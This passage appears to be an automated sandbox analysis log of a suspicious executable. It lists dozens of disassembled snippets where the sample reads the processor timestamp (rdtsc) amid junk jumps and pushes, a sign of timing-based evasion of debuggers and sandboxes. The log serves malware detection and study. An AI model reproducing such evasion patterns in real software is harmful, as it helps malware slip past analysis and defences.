Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D5804F second address: D5805C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FC9F53C6A7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D5805C second address: D58085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FC9F53DFD5Ch 0x0000000d jl 00007FC9F53DFD56h 0x00000013 jmp 00007FC9F53DFD66h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D58085 second address: D58096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A7Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D58096 second address: D5809A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D5809A second address: D580A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D580A0 second address: D580B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FC9F53DFD56h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D580B0 second address: D580B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D60CAD second address: D60CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 jns 00007FC9F53DFD5Ah 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007FC9F53DFD61h 0x00000017 jc 00007FC9F53DFD56h 0x0000001d jmp 00007FC9F53DFD65h 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jl 00007FC9F53DFD56h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D60B77 second address: D60B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D676E1 second address: D6774F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9F53DFD5Ch 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FC9F53DFD69h 0x00000017 jmp 00007FC9F53DFD61h 0x0000001c jmp 00007FC9F53DFD67h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6774F second address: D6775B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9F53C6A7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67B01 second address: D67B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC9F53DFD56h 0x0000000a jmp 00007FC9F53DFD68h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC9F53DFD5Ch 0x00000016 pop eax 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a je 00007FC9F53DFD58h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67B40 second address: D67B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67B46 second address: D67B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67CD9 second address: D67CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67E75 second address: D67E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67E79 second address: D67E7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67E7E second address: D67ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FC9F53DFD66h 0x0000000b ja 00007FC9F53DFD56h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC9F53DFD62h 0x0000001b push eax 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e jmp 00007FC9F53DFD62h 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67ECD second address: D67EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Fh 0x00000007 jng 00007FC9F53C6A82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67EE6 second address: D67EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6A305 second address: D6A309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6A309 second address: D6A30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6E23E second address: D6E261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC9F53C6A81h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6E3B0 second address: D6E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6E3B7 second address: D6E3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC9F53C6A76h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6E3C1 second address: D6E3FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD68h 0x00000007 jmp 00007FC9F53DFD5Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007FC9F53DFD5Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D7FEDB second address: D7FEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FC9F53C6A76h 0x0000000c popad 0x0000000d jl 00007FC9F53C6A7Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D7FEF0 second address: D7FEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 ja 00007FC9F53DFD56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D7FEFD second address: D7FF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D8E920 second address: D8E92E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007FC9F53DFD56h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D8E92E second address: D8E959 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9F53C6A7Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FC9F53C6A88h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA3B4 second address: DAA3CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD63h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA3CB second address: DAA3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA3D5 second address: DAA3E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC9F53DFD56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA3E0 second address: DAA3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA96BE second address: DA96C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9CA3 second address: DA9CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9DE9 second address: DA9DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9DED second address: DA9DF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9DF3 second address: DA9E32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Fh 0x00000007 jmp 00007FC9F53DFD5Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FC9F53DFD68h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9E32 second address: DA9E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53C6A7Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9F8A second address: DA9F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC9F53DFD56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA0FB second address: DAA104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DABA00 second address: DABA04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DABA04 second address: DABA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC9F53C6A7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DACFFB second address: DAD027 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007FC9F53DFD56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jno 00007FC9F53DFD56h 0x00000013 jmp 00007FC9F53DFD60h 0x00000018 pop ebx 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAD027 second address: DAD02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAD02F second address: DAD034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFAC0 second address: DAFAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC9F53C6A8Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFAED second address: DAFAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFAF3 second address: DAFAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB4E second address: DAFB54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB54 second address: DAFB59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB59 second address: DAFB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53DFD60h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f cld 0x00000010 push 00000004h 0x00000012 sub dword ptr [ebp+122D1FAFh], esi 0x00000018 call 00007FC9F53DFD59h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB8B second address: DAFB95 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB95 second address: DAFBB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC9F53DFD65h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFBB7 second address: DAFBBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFBBC second address: DAFBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e pushad 0x0000000f jno 00007FC9F53DFD56h 0x00000015 jmp 00007FC9F53DFD5Ch 0x0000001a popad 0x0000001b pop edi 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f je 00007FC9F53DFD5Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFE1A second address: DAFE55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 ja 00007FC9F53C6A7Eh 0x0000000e mov edx, dword ptr [ebp+122D36C3h] 0x00000014 push dword ptr [ebp+1245E0A9h] 0x0000001a mov dword ptr [ebp+12478E5Fh], eax 0x00000020 call 00007FC9F53C6A79h 0x00000025 push eax 0x00000026 push edx 0x00000027 jne 00007FC9F53C6A78h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51301A9 second address: 513021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC9F53DFD64h 0x00000011 add cx, 9418h 0x00000016 jmp 00007FC9F53DFD5Bh 0x0000001b popfd 0x0000001c call 00007FC9F53DFD68h 0x00000021 jmp 00007FC9F53DFD62h 0x00000026 pop eax 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC9F53DFD5Ah 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513021B second address: 513021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513021F second address: 5130225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130225 second address: 513022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513022B second address: 513022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513022F second address: 5130233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110EA9 second address: 5110EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53DFD5Fh 0x00000009 jmp 00007FC9F53DFD63h 0x0000000e popfd 0x0000000f jmp 00007FC9F53DFD68h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110EF2 second address: 5110EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110EF8 second address: 5110F14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53DFD5Fh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110F14 second address: 5110F4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FC9F53C6A83h 0x00000012 pop esi 0x00000013 mov ax, dx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110F4D second address: 5110F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110F53 second address: 5110F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FC9F53C6A88h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC9F53C6A87h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150DAF second address: 5150DC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150DC6 second address: 5150DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F016F second address: 50F0175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0175 second address: 50F0179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0179 second address: 50F01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e call 00007FC9F53DFD69h 0x00000013 mov dl, ah 0x00000015 pop ebx 0x00000016 popad 0x00000017 push dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F01AD second address: 50F01B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F01B1 second address: 50F01B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B2E second address: 5110B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B32 second address: 5110B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B38 second address: 5110B61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC9F53C6A7Eh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FC9F53C6A7Ch 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B61 second address: 5110B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
